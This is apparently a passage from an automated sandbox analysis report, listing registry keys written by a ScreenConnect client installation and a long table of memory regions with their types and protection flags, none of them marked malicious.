HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
ProductIcon
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
InstanceType
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
AuthorizedLUAApp
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
DeploymentFlags
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F667DD9887E472335D91DFF2CDEF667E
|
78E32BA284E2528F88AE24B3F8AF6685
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685\SourceList
|
PackageName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685\SourceList\Net
|
1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685\SourceList\Media
|
1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
Clients
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685\SourceList
|
LastUsedSource
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings
|
StringCacheGeneration
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
|
AutoBackupLogFiles
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
|
EventMessageFile
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (d519fd2fdcfe66e7)
|
ImagePath
|
There are 87 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
3297000
|
trusted library allocation
|
page read and write
|
||
|
4450000
|
heap
|
page execute and read and write
|
||
|
7FFD9B560000
|
trusted library allocation
|
page read and write
|
||
|
1690000
|
trusted library allocation
|
page read and write
|
||
|
1B32F000
|
heap
|
page read and write
|
||
|
1350000
|
heap
|
page read and write
|
||
|
1B3C7000
|
heap
|
page read and write
|
||
|
7BB0000
|
heap
|
page read and write
|
||
|
1B376000
|
heap
|
page read and write
|
||
|
610D000
|
stack
|
page read and write
|
||
|
7FFD9B2D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16B0000
|
trusted library section
|
page read and write
|
||
|
2A1F000
|
stack
|
page read and write
|
||
|
C00000
|
trusted library section
|
page read and write
|
||
|
5420000
|
heap
|
page read and write
|
||
|
7FFD9B5F0000
|
trusted library allocation
|
page read and write
|
||
|
128E000
|
heap
|
page read and write
|
||
|
4C05000
|
trusted library allocation
|
page read and write
|
||
|
47A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B6C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
434E000
|
trusted library allocation
|
page read and write
|
||
|
1677000
|
trusted library allocation
|
page execute and read and write
|
||
|
11F0000
|
trusted library allocation
|
page read and write
|
||
|
44EB000
|
trusted library allocation
|
page read and write
|
||
|
1B202000
|
unkown
|
page readonly
|
||
|
7FFD9B2D6000
|
trusted library allocation
|
page read and write
|
||
|
4854000
|
trusted library allocation
|
page read and write
|
||
|
14BE000
|
stack
|
page read and write
|
||
|
1C313000
|
heap
|
page execute and read and write
|
||
|
1120000
|
heap
|
page read and write
|
||
|
76EE000
|
stack
|
page read and write
|
||
|
7FFD9B4C0000
|
trusted library allocation
|
page read and write
|
||
|
4860000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B410000
|
trusted library allocation
|
page read and write
|
||
|
124A000
|
heap
|
page read and write
|
||
|
1BE70000
|
heap
|
page read and write
|
||
|
5905000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B540000
|
trusted library allocation
|
page read and write
|
||
|
1690000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B2C6000
|
trusted library allocation
|
page read and write
|
||
|
5E80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B233000
|
trusted library allocation
|
page read and write
|
||
|
164D000
|
trusted library allocation
|
page execute and read and write
|
||
|
32A3000
|
trusted library allocation
|
page read and write
|
||
|
644F000
|
trusted library allocation
|
page read and write
|
||
|
2076000
|
trusted library allocation
|
page read and write
|
||
|
48F0000
|
heap
|
page read and write
|
||
|
1BF1F000
|
heap
|
page read and write
|
||
|
6F1000
|
stack
|
page read and write
|
||
|
4D40000
|
trusted library allocation
|
page read and write
|
||
|
16D0000
|
trusted library allocation
|
page read and write
|
||
|
1888000
|
stack
|
page read and write
|
||
|
1AF4F000
|
stack
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B230000
|
trusted library allocation
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
45E0000
|
trusted library allocation
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B44E000
|
trusted library allocation
|
page read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
7FFD9B214000
|
trusted library allocation
|
page read and write
|
||
|
2ACB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B520000
|
trusted library allocation
|
page read and write
|
||
|
4860000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B600000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B4D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF464140000
|
trusted library allocation
|
page execute and read and write
|
||
|
15A0000
|
heap
|
page execute and read and write
|
||
|
2A54000
|
trusted library allocation
|
page read and write
|
||
|
4D3D000
|
stack
|
page read and write
|
||
|
7FFD9B2DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B4B8000
|
trusted library allocation
|
page read and write
|
||
|
13B3000
|
heap
|
page read and write
|
||
|
1644000
|
trusted library allocation
|
page read and write
|
||
|
4BFE000
|
stack
|
page read and write
|
||
|
4380000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B454000
|
trusted library allocation
|
page read and write
|
||
|
46BE000
|
stack
|
page read and write
|
||
|
7FFD9B3F8000
|
trusted library allocation
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
2B66000
|
heap
|
page read and write
|
||
|
A45000
|
heap
|
page read and write
|
||
|
4860000
|
trusted library allocation
|
page read and write
|
||
|
137C000
|
heap
|
page read and write
|
||
|
5C4000
|
unkown
|
page write copy
|
||
|
12BC000
|
heap
|
page read and write
|
||
|
1BC4E000
|
stack
|
page read and write
|
||
|
139F000
|
heap
|
page read and write
|
||
|
2AA0000
|
trusted library allocation
|
page read and write
|
||
|
735E000
|
stack
|
page read and write
|
||
|
7FFD9B500000
|
trusted library allocation
|
page read and write
|
||
|
1B30C000
|
heap
|
page read and write
|
||
|
43A0000
|
unkown
|
page readonly
|
||
|
4865000
|
trusted library allocation
|
page read and write
|
||
|
6110000
|
trusted library allocation
|
page execute and read and write
|
||
|
826D000
|
trusted library allocation
|
page read and write
|
||
|
1B36E000
|
heap
|
page read and write
|
||
|
2DF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B580000
|
trusted library allocation
|
page read and write
|
||
|
858000
|
heap
|
page read and write
|
||
|
1BE81000
|
heap
|
page read and write
|
||
|
44E0000
|
trusted library allocation
|
page read and write
|
||
|
BE0000
|
heap
|
page execute and read and write
|
||
|
7250000
|
heap
|
page read and write
|
||
|
7FFD9B5A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF0000
|
heap
|
page read and write
|
||
|
76AF000
|
stack
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
5470000
|
heap
|
page execute and read and write
|
||
|
46C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
59FB000
|
trusted library section
|
page read and write
|
||
|
7FFD9B4E0000
|
trusted library allocation
|
page read and write
|
||
|
1B342000
|
heap
|
page read and write
|
||
|
4820000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B500000
|
trusted library allocation
|
page read and write
|
||
|
6D80000
|
heap
|
page execute and read and write
|
||
|
7FFD9B4E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B48B000
|
trusted library allocation
|
page read and write
|
||
|
1285000
|
heap
|
page read and write
|
||
|
6465000
|
trusted library allocation
|
page read and write
|
||
|
12F1000
|
stack
|
page read and write
|
||
|
7FFD9B57A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B21D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
29D7000
|
trusted library allocation
|
page read and write
|
||
|
1650000
|
trusted library allocation
|
page read and write
|
||
|
134E000
|
heap
|
page read and write
|
||
|
7FFD9B630000
|
trusted library allocation
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
4390000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B460000
|
trusted library allocation
|
page read and write
|
||
|
4533000
|
heap
|
page read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
|
3278000
|
trusted library allocation
|
page read and write
|
||
|
5620000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B57C000
|
trusted library allocation
|
page read and write
|
||
|
11E0000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
159E000
|
stack
|
page read and write
|
||
|
599C000
|
stack
|
page read and write
|
||
|
4840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B486000
|
trusted library allocation
|
page read and write
|
||
|
561C000
|
trusted library allocation
|
page read and write
|
||
|
4860000
|
trusted library allocation
|
page read and write
|
||
|
1C9D0000
|
heap
|
page read and write
|
||
|
57F0000
|
trusted library allocation
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
7FFD9B446000
|
trusted library allocation
|
page read and write
|
||
|
EB0000
|
unkown
|
page readonly
|
||
|
1BD4E000
|
stack
|
page read and write
|
||
|
3676000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B620000
|
trusted library allocation
|
page read and write
|
||
|
1210000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B3E0000
|
trusted library allocation
|
page read and write
|
||
|
5BD000
|
unkown
|
page readonly
|
||
|
1176000
|
heap
|
page read and write
|
||
|
1B364000
|
heap
|
page read and write
|
||
|
167B000
|
trusted library allocation
|
page execute and read and write
|
||
|
8150000
|
trusted library allocation
|
page read and write
|
||
|
18E0000
|
heap
|
page read and write
|
||
|
6260000
|
heap
|
page read and write
|
||
|
5FCA000
|
stack
|
page read and write
|
||
|
7CB0000
|
heap
|
page read and write
|
||
|
4790000
|
trusted library allocation
|
page read and write
|
||
|
DA9000
|
stack
|
page read and write
|
||
|
172E000
|
stack
|
page read and write
|
||
|
7FFD9B5E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B57E000
|
trusted library allocation
|
page read and write
|
||
|
2A1000
|
unkown
|
page execute read
|
||
|
7FFD9B5E0000
|
trusted library allocation
|
page read and write
|
||
|
4600000
|
trusted library allocation
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B56A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B2CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
BA0000
|
trusted library allocation
|
page read and write
|
||
|
4370000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B520000
|
trusted library allocation
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B570000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5F0000
|
trusted library allocation
|
page read and write
|
||
|
1560000
|
trusted library allocation
|
page read and write
|
||
|
4820000
|
trusted library allocation
|
page read and write
|
||
|
1277000
|
heap
|
page read and write
|
||
|
745E000
|
stack
|
page read and write
|
||
|
4870000
|
trusted library allocation
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
16B0000
|
heap
|
page read and write
|
||
|
4860000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B2F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B610000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B440000
|
trusted library allocation
|
page read and write
|
||
|
12C9000
|
heap
|
page read and write
|
||
|
5E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B480000
|
trusted library allocation
|
page read and write
|
||
|
2AC0000
|
trusted library allocation
|
page read and write
|
||
|
121B000
|
trusted library allocation
|
page execute and read and write
|
||
|
128B000
|
heap
|
page read and write
|
||
|
2B1A000
|
heap
|
page read and write
|
||
|
7FFD9B5AB000
|
trusted library allocation
|
page read and write
|
||
|
871000
|
heap
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
7A6E000
|
stack
|
page read and write
|
||
|
13A1000
|
heap
|
page read and write
|
||
|
7FFD9B2E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B3DF000
|
trusted library allocation
|
page read and write
|
||
|
117E000
|
stack
|
page read and write
|
||
|
11D0000
|
trusted library allocation
|
page read and write
|
||
|
4470000
|
trusted library allocation
|
page read and write
|
||
|
1C310000
|
heap
|
page execute and read and write
|
||
|
1B2A8000
|
heap
|
page read and write
|
||
|
1212000
|
trusted library allocation
|
page read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
8B8000
|
heap
|
page read and write
|
||
|
71FE000
|
stack
|
page read and write
|
||
|
1680000
|
heap
|
page read and write
|
||
|
2A56000
|
trusted library allocation
|
page read and write
|
||
|
2581000
|
trusted library allocation
|
page read and write
|
||
|
1DEE000
|
stack
|
page read and write
|
||
|
86F000
|
heap
|
page read and write
|
||
|
5901000
|
trusted library allocation
|
page read and write
|
||
|
44F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5670000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B550000
|
trusted library allocation
|
page read and write
|
||
|
9A1000
|
unkown
|
page readonly
|
||
|
2A02000
|
trusted library allocation
|
page read and write
|
||
|
796E000
|
stack
|
page read and write
|
||
|
2F0000
|
unkown
|
page readonly
|
||
|
5676000
|
trusted library allocation
|
page read and write
|
||
|
47D0000
|
trusted library allocation
|
page read and write
|
||
|
5A02000
|
trusted library section
|
page read and write
|
||
|
1666000
|
trusted library allocation
|
page execute and read and write
|
||
|
6447000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B490000
|
trusted library allocation
|
page read and write
|
||
|
1BF24000
|
heap
|
page read and write
|
||
|
7FFD9B23A000
|
trusted library allocation
|
page read and write
|
||
|
48FF000
|
stack
|
page read and write
|
||
|
4351000
|
trusted library allocation
|
page read and write
|
||
|
2B4000
|
unkown
|
page write copy
|
||
|
8149000
|
trusted library allocation
|
page read and write
|
||
|
6133000
|
trusted library allocation
|
page read and write
|
||
|
1BA40000
|
heap
|
page read and write
|
||
|
176E000
|
stack
|
page read and write
|
||
|
87D000
|
heap
|
page read and write
|
||
|
1550000
|
heap
|
page execute and read and write
|
||
|
1BA30000
|
trusted library allocation
|
page read and write
|
||
|
1AFE3000
|
heap
|
page execute and read and write
|
||
|
7FFD9B470000
|
trusted library allocation
|
page read and write
|
||
|
5680000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B426000
|
trusted library allocation
|
page read and write
|
||
|
1170000
|
heap
|
page read and write
|
||
|
1BEBB000
|
heap
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
7FFD9B223000
|
trusted library allocation
|
page execute and read and write
|
||
|
B4E000
|
stack
|
page read and write
|
||
|
5800000
|
trusted library allocation
|
page execute and read and write
|
||
|
2915000
|
heap
|
page read and write
|
||
|
7D8B000
|
trusted library allocation
|
page read and write
|
||
|
2A0000
|
unkown
|
page readonly
|
||
|
1550000
|
trusted library allocation
|
page read and write
|
||
|
5580000
|
trusted library section
|
page read and write
|
||
|
541B000
|
stack
|
page read and write
|
||
|
7FFD9B3B9000
|
trusted library allocation
|
page read and write
|
||
|
337A000
|
trusted library allocation
|
page read and write
|
||
|
5C5E000
|
stack
|
page read and write
|
||
|
53F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B330000
|
trusted library allocation
|
page execute and read and write
|
||
|
11FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
C62000
|
unkown
|
page readonly
|
||
|
7FFD9B510000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B4A1000
|
trusted library allocation
|
page read and write
|
||
|
792F000
|
stack
|
page read and write
|
||
|
839000
|
heap
|
page read and write
|
||
|
C82000
|
unkown
|
page readonly
|
||
|
1B3C0000
|
heap
|
page read and write
|
||
|
7FFD9B5C0000
|
trusted library allocation
|
page read and write
|
||
|
4610000
|
unkown
|
page readonly
|
||
|
15C0000
|
heap
|
page read and write
|
||
|
7FFD9B450000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B4B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B244000
|
trusted library allocation
|
page read and write
|
||
|
723D000
|
stack
|
page read and write
|
||
|
1300000
|
heap
|
page read and write
|
||
|
4460000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B494000
|
trusted library allocation
|
page read and write
|
||
|
5B0000
|
unkown
|
page readonly
|
||
|
2AD000
|
unkown
|
page readonly
|
||
|
12B3000
|
heap
|
page read and write
|
||
|
1217000
|
trusted library allocation
|
page execute and read and write
|
||
|
610C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5B0000
|
trusted library allocation
|
page read and write
|
||
|
561E000
|
stack
|
page read and write
|
||
|
1AB0D000
|
stack
|
page read and write
|
||
|
1325000
|
heap
|
page read and write
|
||
|
44BE000
|
stack
|
page read and write
|
||
|
EB2000
|
unkown
|
page readonly
|
||
|
1AFC0000
|
heap
|
page execute and read and write
|
||
|
2AEA000
|
heap
|
page read and write
|
||
|
11E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
4856000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B590000
|
trusted library allocation
|
page read and write
|
||
|
42F0000
|
unkown
|
page readonly
|
||
|
1BF28000
|
heap
|
page read and write
|
||
|
1230000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B22D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AD000
|
unkown
|
page readonly
|
||
|
7FFD9B3C0000
|
trusted library allocation
|
page read and write
|
||
|
1640000
|
trusted library allocation
|
page read and write
|
||
|
1CE75000
|
heap
|
page read and write
|
||
|
4810000
|
heap
|
page execute and read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
42E0000
|
trusted library allocation
|
page read and write
|
||
|
1180000
|
heap
|
page read and write
|
||
|
4517000
|
trusted library allocation
|
page read and write
|
||
|
153E000
|
stack
|
page read and write
|
||
|
4D60000
|
trusted library allocation
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page read and write
|
||
|
29DE000
|
stack
|
page read and write
|
||
|
7FFD9B23B000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A0000
|
heap
|
page read and write
|
||
|
1202000
|
trusted library allocation
|
page read and write
|
||
|
1215000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B440000
|
unkown
|
page readonly
|
||
|
16C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
143F000
|
stack
|
page read and write
|
||
|
4860000
|
trusted library allocation
|
page read and write
|
||
|
135C000
|
heap
|
page read and write
|
||
|
7FFD9B23D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B59C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B630000
|
trusted library allocation
|
page execute and read and write
|
||
|
9A8000
|
unkown
|
page readonly
|
||
|
1328C000
|
trusted library allocation
|
page read and write
|
||
|
47B0000
|
trusted library allocation
|
page read and write
|
||
|
1393000
|
heap
|
page read and write
|
||
|
5D60000
|
heap
|
page read and write
|
||
|
1399000
|
heap
|
page read and write
|
||
|
1250000
|
trusted library section
|
page read and write
|
||
|
7FFD9B4C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B420000
|
trusted library allocation
|
page read and write
|
||
|
1397000
|
heap
|
page read and write
|
||
|
1BB4E000
|
stack
|
page read and write
|
||
|
2B6000
|
unkown
|
page readonly
|
||
|
C72000
|
unkown
|
page readonly
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
6302000
|
trusted library allocation
|
page read and write
|
||
|
4500000
|
trusted library allocation
|
page read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
2A90000
|
trusted library allocation
|
page read and write
|
||
|
1540000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B420000
|
trusted library allocation
|
page read and write
|
||
|
15C5000
|
heap
|
page read and write
|
||
|
7FFD9B4B1000
|
trusted library allocation
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
113E000
|
stack
|
page read and write
|
||
|
7FFD9B4D0000
|
trusted library allocation
|
page read and write
|
||
|
1B320000
|
heap
|
page read and write
|
||
|
1662000
|
trusted library allocation
|
page read and write
|
||
|
1B31E000
|
heap
|
page read and write
|
||
|
1FDC000
|
trusted library allocation
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
13DB000
|
heap
|
page read and write
|
||
|
4310000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B620000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B408000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B480000
|
trusted library allocation
|
page read and write
|
||
|
5C6000
|
unkown
|
page readonly
|
||
|
5B1C000
|
stack
|
page read and write
|
||
|
782E000
|
stack
|
page read and write
|
||
|
88F000
|
heap
|
page read and write
|
||
|
7FFD9B5C3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B240000
|
trusted library allocation
|
page read and write
|
||
|
478E000
|
stack
|
page read and write
|
||
|
6255000
|
trusted library allocation
|
page read and write
|
||
|
16C0000
|
heap
|
page read and write
|
||
|
5C4000
|
unkown
|
page read and write
|
||
|
1270000
|
trusted library allocation
|
page read and write
|
||
|
1660000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B444000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B224000
|
trusted library allocation
|
page read and write
|
||
|
467E000
|
stack
|
page read and write
|
||
|
1530000
|
trusted library allocation
|
page read and write
|
||
|
5650000
|
trusted library allocation
|
page read and write
|
||
|
1130000
|
heap
|
page read and write
|
||
|
1B290000
|
heap
|
page read and write
|
||
|
7FFD9B410000
|
trusted library allocation
|
page read and write
|
||
|
57D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B540000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B3B0000
|
trusted library allocation
|
page read and write
|
||
|
46D0000
|
trusted library allocation
|
page read and write
|
||
|
1B442000
|
unkown
|
page readonly
|
||
|
4BB0000
|
trusted library allocation
|
page read and write
|
||
|
2A93000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DF7000
|
trusted library allocation
|
page read and write
|
||
|
5A1E000
|
stack
|
page read and write
|
||
|
7FFD9B234000
|
trusted library allocation
|
page read and write
|
||
|
255E000
|
stack
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
1780000
|
heap
|
page read and write
|
||
|
47A9000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B640000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B400000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B210000
|
trusted library allocation
|
page read and write
|
||
|
C70000
|
unkown
|
page readonly
|
||
|
1280000
|
heap
|
page read and write
|
||
|
7FFD9B3D0000
|
trusted library allocation
|
page read and write
|
||
|
1CADD000
|
stack
|
page read and write
|
||
|
4320000
|
trusted library allocation
|
page read and write
|
||
|
613A000
|
trusted library allocation
|
page read and write
|
||
|
1BF70000
|
trusted library section
|
page read and write
|
||
|
4541000
|
heap
|
page read and write
|
||
|
4BA0000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
57E0000
|
trusted library allocation
|
page read and write
|
||
|
13BD000
|
stack
|
page read and write
|
||
|
47C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BE1D000
|
stack
|
page read and write
|
||
|
646E000
|
trusted library allocation
|
page read and write
|
||
|
1374000
|
heap
|
page read and write
|
||
|
1AFE0000
|
heap
|
page execute and read and write
|
||
|
1B9BE000
|
stack
|
page read and write
|
||
|
7FFD9B530000
|
trusted library allocation
|
page read and write
|
||
|
2F71000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B415000
|
trusted library allocation
|
page read and write
|
||
|
584E000
|
stack
|
page read and write
|
||
|
506E000
|
stack
|
page read and write
|
||
|
7FFD9B400000
|
trusted library allocation
|
page read and write
|
||
|
2A94000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B430000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B450000
|
trusted library allocation
|
page read and write
|
||
|
F40000
|
unkown
|
page readonly
|
||
|
45A0000
|
unkown
|
page readonly
|
||
|
7FFD9B3D0000
|
trusted library allocation
|
page read and write
|
||
|
4379000
|
trusted library allocation
|
page read and write
|
||
|
1B63C000
|
stack
|
page read and write
|
||
|
4CFD000
|
stack
|
page read and write
|
||
|
7FFD9B610000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
7FB2000
|
trusted library allocation
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
11E4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B580000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5D0000
|
trusted library allocation
|
page read and write
|
||
|
1B323000
|
heap
|
page read and write
|
||
|
1CE60000
|
heap
|
page read and write
|
||
|
873000
|
heap
|
page read and write
|
||
|
131C1000
|
trusted library allocation
|
page read and write
|
||
|
62FB000
|
trusted library allocation
|
page read and write
|
||
|
28EB000
|
trusted library allocation
|
page read and write
|
||
|
163C000
|
stack
|
page read and write
|
||
|
7FFD9B26C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B36B000
|
heap
|
page read and write
|
||
|
1C6E7000
|
stack
|
page read and write
|
||
|
5C2E000
|
stack
|
page read and write
|
||
|
1B337000
|
heap
|
page read and write
|
||
|
10FD000
|
stack
|
page read and write
|
||
|
46E4000
|
trusted library allocation
|
page read and write
|
||
|
CB5000
|
heap
|
page read and write
|
||
|
1B31B000
|
heap
|
page read and write
|
||
|
7FFD9B5A0000
|
trusted library allocation
|
page read and write
|
||
|
167D000
|
stack
|
page read and write
|
||
|
4854000
|
trusted library allocation
|
page read and write
|
||
|
1BA00000
|
heap
|
page execute and read and write
|
||
|
2570000
|
heap
|
page read and write
|
||
|
5D5D000
|
stack
|
page read and write
|
||
|
2A80000
|
trusted library allocation
|
page read and write
|
||
|
1675000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B470000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B22D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B334000
|
heap
|
page read and write
|
||
|
7FFD9B550000
|
trusted library allocation
|
page read and write
|
||
|
18CF000
|
stack
|
page read and write
|
||
|
1CE72000
|
heap
|
page read and write
|
||
|
7FFD9B4F0000
|
trusted library allocation
|
page read and write
|
||
|
4D50000
|
trusted library allocation
|
page read and write
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
4540000
|
heap
|
page read and write
|
||
|
3535000
|
trusted library allocation
|
page read and write
|
||
|
2B26000
|
heap
|
page read and write
|
||
|
585B000
|
stack
|
page read and write
|
||
|
6443000
|
trusted library allocation
|
page read and write
|
||
|
1312000
|
heap
|
page read and write
|
||
|
7FFD9B2D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B220000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B4A8000
|
trusted library allocation
|
page read and write
|
||
|
7AAC000
|
stack
|
page read and write
|
||
|
5ECE000
|
stack
|
page read and write
|
||
|
16A0000
|
heap
|
page execute and read and write
|
||
|
5630000
|
trusted library section
|
page read and write
|
||
|
5BD000
|
unkown
|
page readonly
|
||
|
4700000
|
heap
|
page read and write
|
||
|
DBD000
|
stack
|
page read and write
|
||
|
7FFD9B430000
|
trusted library allocation
|
page read and write
|
||
|
4B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B29D000
|
heap
|
page read and write
|
||
|
5C1B000
|
stack
|
page read and write
|
||
|
16E0000
|
heap
|
page read and write
|
||
|
557E000
|
stack
|
page read and write
|
||
|
1B3CB000
|
heap
|
page read and write
|
||
|
7FFD9B213000
|
trusted library allocation
|
page execute and read and write
|
||
|
31C1000
|
trusted library allocation
|
page read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
4901000
|
trusted library allocation
|
page read and write
|
||
|
1563000
|
trusted library allocation
|
page read and write
|
||
|
1BF02000
|
heap
|
page read and write
|
||
|
124E000
|
heap
|
page read and write
|
||
|
6441000
|
